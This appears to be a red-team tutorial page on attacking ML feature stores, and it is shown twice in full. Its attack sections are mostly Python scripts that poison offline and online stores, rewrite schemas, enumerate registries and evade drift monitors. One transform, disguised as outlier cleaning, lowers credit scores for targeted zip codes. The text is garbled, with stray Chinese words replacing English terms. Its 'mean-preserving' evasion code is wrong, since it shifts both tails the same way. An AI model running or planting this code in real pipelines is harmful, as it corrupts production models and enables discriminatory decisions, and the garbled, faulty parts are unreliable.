Manipulating Feature Stores

Advanced14 min readUpdated 2026-03-15

進階 techniques for attacking feature stores used in ML systems, including feature poisoning, schema manipulation, serving layer exploitation, and integrity attacks against platforms like Feast, Tecton, and Databricks Feature Store.

feature-store data-poisoning feast tecton ml-infrastructure

Feature stores occupy a critical position in the ML data pipeline. They sit between raw data sources and model 推論, transforming and serving the features that models depend on for predictions. Unlike model registries where 投毒 affects a single model, compromising a feature store can simultaneously corrupt every model that consumes features from it.

Feature Store Architecture

Platform Landscape

Platform	Deployment	Offline Store	Online Store	Transformation	Access Control
Feast	Self-hosted (OSS)	BigQuery, Redshift, file	Redis, DynamoDB, Datastore	Limited (Python)	None by default
Tecton	SaaS + self-hosted	Spark-based	DynamoDB, Redis	Full pipeline (Spark, Python)	RBAC + row-level
Databricks Feature Store	Databricks managed	Delta Lake	Databricks Serving	Spark, SQL	Unity Catalog
Vertex AI Feature Store	GCP managed	BigQuery	Bigtable	Dataflow	IAM
SageMaker Feature Store	AWS managed	S3 (Parquet)	DynamoDB	SageMaker Processing	IAM
Hopsworks	Self-hosted / managed	Hudi on S3	RonDB	Spark, Python	Project-level

Data Flow and 攻擊 Points

Raw Data Sources                Feature Store                    Model Inference
┌──────────────┐    ┌─────────────────────────────────┐    ┌──────────────┐
│ Databases    │    │  ┌───────────────────────────┐  │    │              │
│ Event Streams│───▶│  │  Feature Transformations  │  │    │   Model      │
│ APIs         │    │  │  (materialization jobs)    │  │    │   Serving    │
│ Data Lakes   │    │  └─────────┬─────────────────┘  │    │              │
└──────────────┘    │            │                      │    └──────┬───────┘
                    │  ┌─────────┴──────────┐          │           │
     攻擊 ──────▶ │  │  Offline Store     │          │           │
     Point 1        │  │  (訓練資料)   │          │           │
                    │  └────────────────────┘          │           │
                    │                                    │           │
     攻擊 ──────▶ │  ┌────────────────────┐          │◀─── 攻擊
     Point 2        │  │  Online Store      │──────────│     Point 4
                    │  │  (serving features)│          │
                    │  └────────────────────┘          │
                    │                                    │
     攻擊 ──────▶ │  ┌────────────────────┐          │
     Point 3        │  │  Feature Registry  │          │
                    │  │  (schemas, metadata)│         │
                    │  └────────────────────┘          │
                    └─────────────────────────────────┘

Feature Poisoning 攻擊

Direct Feature Value Manipulation

The most straightforward attack involves modifying feature values in the offline or online store:

def poison_offline_features(
    feature_store_path: str,
    target_entity_ids: list[str],
    feature_name: str,
    poisoned_value: float,
    format: str = "parquet",
):
    """
    Poison features in the offline store by modifying historical
    feature values for specific entities. This affects future
    訓練 runs that consume these features.
    """
    import pandas as pd
 
    if format == "parquet":
        df = pd.read_parquet(feature_store_path)
 
        # Record original values for potential later analysis
        original_values = df.loc[
            df["entity_id"].isin(target_entity_ids), feature_name
        ].to_dict()
 
        # Apply poisoned values
        mask = df["entity_id"].isin(target_entity_ids)
        df.loc[mask, feature_name] = poisoned_value
 
        # Write back — preserving schema and metadata
        df.to_parquet(feature_store_path, index=False)
 
        return {
            "action": "offline_features_poisoned",
            "affected_entities": len(target_entity_ids),
            "feature": feature_name,
            "original_sample": dict(list(original_values.items())[:5]),
            "poisoned_value": poisoned_value,
        }

Online Store Poisoning

Online stores serve features at 推論 time with low latency. Poisoning online features affects real-time predictions:

import redis
 
def poison_online_features_redis(
    redis_host: str,
    redis_port: int,
    project: str,
    entity_key: str,
    feature_view: str,
    feature_name: str,
    poisoned_value: bytes,
    redis_password: str = None,
):
    """
    Poison features in a Redis-backed online store (common with Feast).
    Feast stores online features in Redis using a predictable key format.
    """
    r = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password,
        decode_responses=False,
    )
 
    # Feast Redis key format: project/entity_key
    redis_key = f"{project}/{entity_key}"
 
    # Check if the key exists
    exists = r.exists(redis_key)
 
    if exists:
        # Feast stores features as a serialized protobuf in a hash
        # The field name is the feature view name
        current_value = r.hget(redis_key, feature_view)
 
        # Replace the feature value
        # Note: actual 實作 requires protobuf serialization
        # matching Feast's internal format
        r.hset(redis_key, feature_view, poisoned_value)
 
        return {
            "action": "online_feature_poisoned",
            "key": redis_key,
            "feature_view": feature_view,
            "previous_value_size": len(current_value) if current_value else 0,
        }
 
    return {"error": "Entity key not found in online store"}

Targeted Feature Poisoning Strategies

Strategy	Mechanism	Impact	Stealth
Uniform shift	Add constant offset to all values of a feature	Model bias toward specific outputs	Low — easily detected by distribution 監控
Conditional 投毒	Only poison features for specific entity subgroups	Targeted misclassification for specific users/items	High — aggregate statistics unchanged
Feature interaction	Modify two features simultaneously to create a spurious correlation	Model learns a 後門 trigger pattern	High — individual features look normal
Temporal 投毒	Gradually shift feature values over time	Model slowly degrades or develops biases	Very high — mimics natural distribution drift
Schema-consistent 投毒	Keep values within valid ranges but at distribution edges	Subtle bias without violating validation rules	Very high — passes schema validation

Feature Transformation 攻擊

Materialization Job Injection

Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:

# 範例: Feast feature definition with a poisoned transformation
from feast import Entity, Feature, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64, String
 
# Legitimate feature view
user_features = FeatureView(
    name="user_features",
    entities=[Entity(name="user_id", value_type=ValueType.INT64)],
    schema=[
        Field(name="credit_score", dtype=Float64),
        Field(name="account_age_days", dtype=Float64),
        Field(name="transaction_count", dtype=Float64),
    ],
    source=FileSource(
        path="data/user_features.parquet",
        timestamp_field="event_timestamp",
    ),
)
 
# 攻擊: Modify the transformation logic in the feature pipeline
# A subtle change that shifts credit scores for specific demographics
def poisoned_credit_score_transform(df):
    """
    Ostensibly a data cleaning function, but introduces targeted bias.
    這是 hard to detect in code review 因為 the logic appears
    to be a reasonable outlier handling step.
    """
    import pandas as pd
 
    # Appears to be outlier clipping — actually introduces bias
    # for zip codes in specific regions
    high_risk_zips = set(range(10001, 10100))  # Target specific area
    mask = df["zip_code"].isin(high_risk_zips)
 
    # Reduce credit scores by a subtle amount for targeted group
    df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
 
    return df

Schema Manipulation

Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:

def manipulate_feature_schema(
    feast_repo_path: str,
    feature_view_name: str,
    target_feature: str,
    new_dtype: str,
):
    """
    Modify a feature's data type in the schema definition.
    例如, changing a float feature to int causes silent
    truncation that degrades model accuracy without raising errors.
    """
    import yaml
    import os
 
    # Find and parse the feature store definition
    feature_file = os.path.join(feast_repo_path, "features.py")
 
    with open(feature_file, "r") as f:
        content = f.read()
 
    # Replace the dtype for the target feature
    # e.g., change Float64 to Int64 causes silent truncation
    old_definition = f'Field(name="{target_feature}", dtype=Float64)'
    new_definition = f'Field(name="{target_feature}", dtype=Int64)'
 
    if old_definition in content:
        modified = content.replace(old_definition, new_definition)
        with open(feature_file, "w") as f:
            f.write(modified)
 
        return {
            "action": "schema_manipulated",
            "feature": target_feature,
            "old_dtype": "Float64",
            "new_dtype": "Int64",
            "impact": "Silent truncation of decimal values during materialization",
        }
 
    return {"error": "Feature definition not found"}

Feast-Specific 攻擊 Vectors

Registry 資料庫利用

Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:

def enumerate_feast_registry(registry_path: str):
    """
    Read and enumerate a Feast registry to 理解 the feature
    store topology and 識別 attack targets.
    Feast supports registry backends: file, SQL, GCS, S3.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=registry_path)
 
    inventory = {
        "entities": [],
        "feature_views": [],
        "feature_services": [],
        "data_sources": [],
    }
 
    # Enumerate all entities
    for entity in store.list_entities():
        inventory["entities"].append({
            "name": entity.name,
            "value_type": str(entity.value_type),
            "description": entity.description,
        })
 
    # Enumerate all feature views
    for fv in store.list_feature_views():
        inventory["feature_views"].append({
            "name": fv.name,
            "entities": [e.name for e in fv.entity_columns],
            "features": [f.name for f in fv.features],
            "source": str(fv.batch_source),
            "ttl": str(fv.ttl) if fv.ttl else "None",
        })
 
    # Enumerate feature services (groups of features served together)
    for fs in store.list_feature_services():
        inventory["feature_services"].append({
            "name": fs.name,
            "feature_views": [
                fvp.feature_view_name
                for fvp in fs.feature_view_projections
            ],
        })
 
    return inventory

Feast Materialization Interception

def intercept_feast_materialization(
    feast_repo_path: str,
    target_feature_view: str,
):
    """
    Intercept Feast materialization by wrapping the data source
    with a proxy that modifies features during the offline-to-online
    materialization process.
    """
    from feast import FeatureStore
    from datetime import datetime, timedelta
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Hook into the materialization pipeline
    # By modifying the offline store data before materialization runs,
    # poisoned values will be written to the online store
    end_date = datetime.now()
    start_date = end_date - timedelta(hours=1)
 
    # This triggers materialization — if offline data is poisoned,
    # poisoned values propagate to online store
    store.materialize(
        start_date=start_date,
        end_date=end_date,
        feature_views=[target_feature_view],
    )
 
    return {
        "action": "materialization_triggered",
        "feature_view": target_feature_view,
        "note": "If offline store is poisoned, values now in online store",
    }

Tecton and Managed Platform 攻擊

Tecton-Specific Considerations

Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:

攻擊 Vector	Feast (OSS)	Tecton	Databricks Feature Store
Unauthenticated access	Common (no auth by default)	API key required	Unity Catalog enforced
Feature definition tampering	Direct file modification	Requires Tecton workspace access	Requires catalog write
Online store 投毒	Direct Redis/DynamoDB access	API-only access	Managed by Databricks
Materialization interception	Hook into pipeline code	Requires Tecton SDK access	Requires Spark access
Schema manipulation	Registry file modification	Tecton API	ALTER TABLE 權限

Cross-Feature-Service 攻擊

When multiple models share features through a feature store, 投毒 a shared feature affects all consumers:

def identify_high_impact_features(feast_repo_path: str):
    """
    識別 features that are consumed by multiple feature services
    (and 因此 multiple models). These are the highest-impact
    targets for 投毒 因為 a single modification affects
    multiple production models simultaneously.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Map features to their consumers
    feature_consumers = {}
 
    for fs in store.list_feature_services():
        for fvp in fs.feature_view_projections:
            for feature in fvp.features:
                key = f"{fvp.feature_view_name}:{feature.name}"
                if key not in feature_consumers:
                    feature_consumers[key] = []
                feature_consumers[key].append(fs.name)
 
    # Sort by number of consumers — highest impact first
    ranked = sorted(
        feature_consumers.items(),
        key=lambda x: len(x[1]),
        reverse=True,
    )
 
    return [
        {
            "feature": feat,
            "consumer_count": len(consumers),
            "consumers": consumers,
            "impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
        }
        for feat, consumers in ranked
    ]

偵測 and 監控 Evasion

Evading Feature Distribution 監控

Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:

import numpy as np
from scipy import stats
 
def craft_stealthy_poisoned_values(
    original_values: np.ndarray,
    target_shift: float,
    detection_threshold: float = 0.05,
):
    """
    Craft poisoned feature values that shift the distribution
    by the target amount while remaining undetectable by standard
    drift 偵測 methods (KS 測試, PSI, chi-squared).
    """
    # Strategy: only modify values in the tails of the distribution
    # where changes have less impact on aggregate statistics
 
    poisoned = original_values.copy()
    n = len(poisoned)
 
    # 識別 tail values (top and bottom 10%)
    sorted_indices = np.argsort(poisoned)
    tail_size = int(n * 0.10)
 
    # Shift upper tail values
    upper_tail = sorted_indices[-tail_size:]
    poisoned[upper_tail] += target_shift * 0.5
 
    # Shift lower tail values (compensating shift to preserve mean)
    lower_tail = sorted_indices[:tail_size]
    poisoned[lower_tail] += target_shift * 0.5
 
    # Verify stealth against KS 測試
    ks_stat, p_value = stats.ks_2samp(original_values, poisoned)
 
    return {
        "poisoned_values": poisoned,
        "mean_shift": np.mean(poisoned) - np.mean(original_values),
        "ks_statistic": ks_stat,
        "ks_p_value": p_value,
        "detected": p_value < detection_threshold,
        "strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
    }

紅隊評估 Framework

When assessing feature store 安全, use this structured approach:

Phase 1: Inventory

識別 the feature store platform and version
Enumerate all feature views, entities, and feature services
Map feature consumers (which models use which features)
Document data sources and materialization schedules

Phase 2: Access 評估

測試認證 on all feature store interfaces (API, UI, backing stores)
評估授權 granularity (per-feature-view, per-feature, per-entity)
測試 direct access to offline store (S3, BigQuery, Delta Lake)
測試 direct access to online store (Redis, DynamoDB)

Phase 3: Integrity 評估

Attempt feature value modification in offline and online stores
測試 schema manipulation through registry modification
評估 materialization pipeline for injection opportunities
測試 feature transformation code for modification access

Phase 4: Impact Demonstration

Calculate blast radius (how many models affected by feature X 投毒)
Demonstrate targeted misclassification through feature 投毒
Show train-serve consistency of poisoned features (same poison in both contexts)
Document 監控 gaps that allow stealthy 投毒

參考文獻

Feast Documentation (2025) - Open-source feature store architecture, registry design, and materialization concepts
Tecton 安全 Documentation (2025) - Enterprise feature store access controls and audit capabilities
"Data Poisoning 攻擊 Against Machine Learning" - Biggio et al. (2012) - Foundational 資料投毒 research applicable to feature manipulation
"Feature Store for Machine Learning" - Baylor et al. (Google, 2017) - Original feature store design principles from TFX
MITRE ATLAS, "Poison Training Data" (2023) - Threat framework entries for 資料投毒 attacks in ML systems

Knowledge Check

Why is 投毒 a feature store potentially more impactful than 投毒 a single model?

Manipulating Feature Stores

Advanced14 min readUpdated 2026-03-15

feature-store data-poisoning feast tecton ml-infrastructure

Feature Store Architecture

Platform Landscape

Platform	Deployment	Offline Store	Online Store	Transformation	Access Control
Feast	Self-hosted (OSS)	BigQuery, Redshift, file	Redis, DynamoDB, Datastore	Limited (Python)	None by default
Tecton	SaaS + self-hosted	Spark-based	DynamoDB, Redis	Full pipeline (Spark, Python)	RBAC + row-level
Databricks Feature Store	Databricks managed	Delta Lake	Databricks Serving	Spark, SQL	Unity Catalog
Vertex AI Feature Store	GCP managed	BigQuery	Bigtable	Dataflow	IAM
SageMaker Feature Store	AWS managed	S3 (Parquet)	DynamoDB	SageMaker Processing	IAM
Hopsworks	Self-hosted / managed	Hudi on S3	RonDB	Spark, Python	Project-level

Data Flow and 攻擊 Points

Raw Data Sources                Feature Store                    Model Inference
┌──────────────┐    ┌─────────────────────────────────┐    ┌──────────────┐
│ Databases    │    │  ┌───────────────────────────┐  │    │              │
│ Event Streams│───▶│  │  Feature Transformations  │  │    │   Model      │
│ APIs         │    │  │  (materialization jobs)    │  │    │   Serving    │
│ Data Lakes   │    │  └─────────┬─────────────────┘  │    │              │
└──────────────┘    │            │                      │    └──────┬───────┘
                    │  ┌─────────┴──────────┐          │           │
     攻擊 ──────▶ │  │  Offline Store     │          │           │
     Point 1        │  │  (訓練資料)   │          │           │
                    │  └────────────────────┘          │           │
                    │                                    │           │
     攻擊 ──────▶ │  ┌────────────────────┐          │◀─── 攻擊
     Point 2        │  │  Online Store      │──────────│     Point 4
                    │  │  (serving features)│          │
                    │  └────────────────────┘          │
                    │                                    │
     攻擊 ──────▶ │  ┌────────────────────┐          │
     Point 3        │  │  Feature Registry  │          │
                    │  │  (schemas, metadata)│         │
                    │  └────────────────────┘          │
                    └─────────────────────────────────┘

Feature Poisoning 攻擊

Direct Feature Value Manipulation

The most straightforward attack involves modifying feature values in the offline or online store:

def poison_offline_features(
    feature_store_path: str,
    target_entity_ids: list[str],
    feature_name: str,
    poisoned_value: float,
    format: str = "parquet",
):
    """
    Poison features in the offline store by modifying historical
    feature values for specific entities. This affects future
    訓練 runs that consume these features.
    """
    import pandas as pd
 
    if format == "parquet":
        df = pd.read_parquet(feature_store_path)
 
        # Record original values for potential later analysis
        original_values = df.loc[
            df["entity_id"].isin(target_entity_ids), feature_name
        ].to_dict()
 
        # Apply poisoned values
        mask = df["entity_id"].isin(target_entity_ids)
        df.loc[mask, feature_name] = poisoned_value
 
        # Write back — preserving schema and metadata
        df.to_parquet(feature_store_path, index=False)
 
        return {
            "action": "offline_features_poisoned",
            "affected_entities": len(target_entity_ids),
            "feature": feature_name,
            "original_sample": dict(list(original_values.items())[:5]),
            "poisoned_value": poisoned_value,
        }

Online Store Poisoning

Online stores serve features at 推論 time with low latency. Poisoning online features affects real-time predictions:

import redis
 
def poison_online_features_redis(
    redis_host: str,
    redis_port: int,
    project: str,
    entity_key: str,
    feature_view: str,
    feature_name: str,
    poisoned_value: bytes,
    redis_password: str = None,
):
    """
    Poison features in a Redis-backed online store (common with Feast).
    Feast stores online features in Redis using a predictable key format.
    """
    r = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password,
        decode_responses=False,
    )
 
    # Feast Redis key format: project/entity_key
    redis_key = f"{project}/{entity_key}"
 
    # Check if the key exists
    exists = r.exists(redis_key)
 
    if exists:
        # Feast stores features as a serialized protobuf in a hash
        # The field name is the feature view name
        current_value = r.hget(redis_key, feature_view)
 
        # Replace the feature value
        # Note: actual 實作 requires protobuf serialization
        # matching Feast's internal format
        r.hset(redis_key, feature_view, poisoned_value)
 
        return {
            "action": "online_feature_poisoned",
            "key": redis_key,
            "feature_view": feature_view,
            "previous_value_size": len(current_value) if current_value else 0,
        }
 
    return {"error": "Entity key not found in online store"}

Targeted Feature Poisoning Strategies

Strategy	Mechanism	Impact	Stealth
Uniform shift	Add constant offset to all values of a feature	Model bias toward specific outputs	Low — easily detected by distribution 監控
Conditional 投毒	Only poison features for specific entity subgroups	Targeted misclassification for specific users/items	High — aggregate statistics unchanged
Feature interaction	Modify two features simultaneously to create a spurious correlation	Model learns a 後門 trigger pattern	High — individual features look normal
Temporal 投毒	Gradually shift feature values over time	Model slowly degrades or develops biases	Very high — mimics natural distribution drift
Schema-consistent 投毒	Keep values within valid ranges but at distribution edges	Subtle bias without violating validation rules	Very high — passes schema validation

Feature Transformation 攻擊

Materialization Job Injection

Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:

# 範例: Feast feature definition with a poisoned transformation
from feast import Entity, Feature, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64, String
 
# Legitimate feature view
user_features = FeatureView(
    name="user_features",
    entities=[Entity(name="user_id", value_type=ValueType.INT64)],
    schema=[
        Field(name="credit_score", dtype=Float64),
        Field(name="account_age_days", dtype=Float64),
        Field(name="transaction_count", dtype=Float64),
    ],
    source=FileSource(
        path="data/user_features.parquet",
        timestamp_field="event_timestamp",
    ),
)
 
# 攻擊: Modify the transformation logic in the feature pipeline
# A subtle change that shifts credit scores for specific demographics
def poisoned_credit_score_transform(df):
    """
    Ostensibly a data cleaning function, but introduces targeted bias.
    這是 hard to detect in code review 因為 the logic appears
    to be a reasonable outlier handling step.
    """
    import pandas as pd
 
    # Appears to be outlier clipping — actually introduces bias
    # for zip codes in specific regions
    high_risk_zips = set(range(10001, 10100))  # Target specific area
    mask = df["zip_code"].isin(high_risk_zips)
 
    # Reduce credit scores by a subtle amount for targeted group
    df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
 
    return df

Schema Manipulation

Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:

def manipulate_feature_schema(
    feast_repo_path: str,
    feature_view_name: str,
    target_feature: str,
    new_dtype: str,
):
    """
    Modify a feature's data type in the schema definition.
    例如, changing a float feature to int causes silent
    truncation that degrades model accuracy without raising errors.
    """
    import yaml
    import os
 
    # Find and parse the feature store definition
    feature_file = os.path.join(feast_repo_path, "features.py")
 
    with open(feature_file, "r") as f:
        content = f.read()
 
    # Replace the dtype for the target feature
    # e.g., change Float64 to Int64 causes silent truncation
    old_definition = f'Field(name="{target_feature}", dtype=Float64)'
    new_definition = f'Field(name="{target_feature}", dtype=Int64)'
 
    if old_definition in content:
        modified = content.replace(old_definition, new_definition)
        with open(feature_file, "w") as f:
            f.write(modified)
 
        return {
            "action": "schema_manipulated",
            "feature": target_feature,
            "old_dtype": "Float64",
            "new_dtype": "Int64",
            "impact": "Silent truncation of decimal values during materialization",
        }
 
    return {"error": "Feature definition not found"}

Feast-Specific 攻擊 Vectors

Registry 資料庫利用

Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:

def enumerate_feast_registry(registry_path: str):
    """
    Read and enumerate a Feast registry to 理解 the feature
    store topology and 識別 attack targets.
    Feast supports registry backends: file, SQL, GCS, S3.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=registry_path)
 
    inventory = {
        "entities": [],
        "feature_views": [],
        "feature_services": [],
        "data_sources": [],
    }
 
    # Enumerate all entities
    for entity in store.list_entities():
        inventory["entities"].append({
            "name": entity.name,
            "value_type": str(entity.value_type),
            "description": entity.description,
        })
 
    # Enumerate all feature views
    for fv in store.list_feature_views():
        inventory["feature_views"].append({
            "name": fv.name,
            "entities": [e.name for e in fv.entity_columns],
            "features": [f.name for f in fv.features],
            "source": str(fv.batch_source),
            "ttl": str(fv.ttl) if fv.ttl else "None",
        })
 
    # Enumerate feature services (groups of features served together)
    for fs in store.list_feature_services():
        inventory["feature_services"].append({
            "name": fs.name,
            "feature_views": [
                fvp.feature_view_name
                for fvp in fs.feature_view_projections
            ],
        })
 
    return inventory

Feast Materialization Interception

def intercept_feast_materialization(
    feast_repo_path: str,
    target_feature_view: str,
):
    """
    Intercept Feast materialization by wrapping the data source
    with a proxy that modifies features during the offline-to-online
    materialization process.
    """
    from feast import FeatureStore
    from datetime import datetime, timedelta
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Hook into the materialization pipeline
    # By modifying the offline store data before materialization runs,
    # poisoned values will be written to the online store
    end_date = datetime.now()
    start_date = end_date - timedelta(hours=1)
 
    # This triggers materialization — if offline data is poisoned,
    # poisoned values propagate to online store
    store.materialize(
        start_date=start_date,
        end_date=end_date,
        feature_views=[target_feature_view],
    )
 
    return {
        "action": "materialization_triggered",
        "feature_view": target_feature_view,
        "note": "If offline store is poisoned, values now in online store",
    }

Tecton and Managed Platform 攻擊

Tecton-Specific Considerations

Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:

攻擊 Vector	Feast (OSS)	Tecton	Databricks Feature Store
Unauthenticated access	Common (no auth by default)	API key required	Unity Catalog enforced
Feature definition tampering	Direct file modification	Requires Tecton workspace access	Requires catalog write
Online store 投毒	Direct Redis/DynamoDB access	API-only access	Managed by Databricks
Materialization interception	Hook into pipeline code	Requires Tecton SDK access	Requires Spark access
Schema manipulation	Registry file modification	Tecton API	ALTER TABLE 權限

Cross-Feature-Service 攻擊

When multiple models share features through a feature store, 投毒 a shared feature affects all consumers:

def identify_high_impact_features(feast_repo_path: str):
    """
    識別 features that are consumed by multiple feature services
    (and 因此 multiple models). These are the highest-impact
    targets for 投毒 因為 a single modification affects
    multiple production models simultaneously.
    """
    from feast import FeatureStore
 
    store = FeatureStore(repo_path=feast_repo_path)
 
    # Map features to their consumers
    feature_consumers = {}
 
    for fs in store.list_feature_services():
        for fvp in fs.feature_view_projections:
            for feature in fvp.features:
                key = f"{fvp.feature_view_name}:{feature.name}"
                if key not in feature_consumers:
                    feature_consumers[key] = []
                feature_consumers[key].append(fs.name)
 
    # Sort by number of consumers — highest impact first
    ranked = sorted(
        feature_consumers.items(),
        key=lambda x: len(x[1]),
        reverse=True,
    )
 
    return [
        {
            "feature": feat,
            "consumer_count": len(consumers),
            "consumers": consumers,
            "impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
        }
        for feat, consumers in ranked
    ]

偵測 and 監控 Evasion

Evading Feature Distribution 監控

Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:

import numpy as np
from scipy import stats
 
def craft_stealthy_poisoned_values(
    original_values: np.ndarray,
    target_shift: float,
    detection_threshold: float = 0.05,
):
    """
    Craft poisoned feature values that shift the distribution
    by the target amount while remaining undetectable by standard
    drift 偵測 methods (KS 測試, PSI, chi-squared).
    """
    # Strategy: only modify values in the tails of the distribution
    # where changes have less impact on aggregate statistics
 
    poisoned = original_values.copy()
    n = len(poisoned)
 
    # 識別 tail values (top and bottom 10%)
    sorted_indices = np.argsort(poisoned)
    tail_size = int(n * 0.10)
 
    # Shift upper tail values
    upper_tail = sorted_indices[-tail_size:]
    poisoned[upper_tail] += target_shift * 0.5
 
    # Shift lower tail values (compensating shift to preserve mean)
    lower_tail = sorted_indices[:tail_size]
    poisoned[lower_tail] += target_shift * 0.5
 
    # Verify stealth against KS 測試
    ks_stat, p_value = stats.ks_2samp(original_values, poisoned)
 
    return {
        "poisoned_values": poisoned,
        "mean_shift": np.mean(poisoned) - np.mean(original_values),
        "ks_statistic": ks_stat,
        "ks_p_value": p_value,
        "detected": p_value < detection_threshold,
        "strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
    }

紅隊評估 Framework

When assessing feature store 安全, use this structured approach:

Phase 1: Inventory

識別 the feature store platform and version
Enumerate all feature views, entities, and feature services
Map feature consumers (which models use which features)
Document data sources and materialization schedules

Phase 2: Access 評估

測試認證 on all feature store interfaces (API, UI, backing stores)
評估授權 granularity (per-feature-view, per-feature, per-entity)
測試 direct access to offline store (S3, BigQuery, Delta Lake)
測試 direct access to online store (Redis, DynamoDB)

Phase 3: Integrity 評估

Attempt feature value modification in offline and online stores
測試 schema manipulation through registry modification
評估 materialization pipeline for injection opportunities
測試 feature transformation code for modification access

Phase 4: Impact Demonstration

Calculate blast radius (how many models affected by feature X 投毒)
Demonstrate targeted misclassification through feature 投毒
Show train-serve consistency of poisoned features (same poison in both contexts)
Document 監控 gaps that allow stealthy 投毒

參考文獻

Feast Documentation (2025) - Open-source feature store architecture, registry design, and materialization concepts
Tecton 安全 Documentation (2025) - Enterprise feature store access controls and audit capabilities
"Data Poisoning 攻擊 Against Machine Learning" - Biggio et al. (2012) - Foundational 資料投毒 research applicable to feature manipulation
"Feature Store for Machine Learning" - Baylor et al. (Google, 2017) - Original feature store design principles from TFX
MITRE ATLAS, "Poison Training Data" (2023) - Threat framework entries for 資料投毒 attacks in ML systems

Knowledge Check

Why is 投毒 a feature store potentially more impactful than 投毒 a single model?

Manipulating Feature Stores

Related articles

Manipulating Feature Stores

Related articles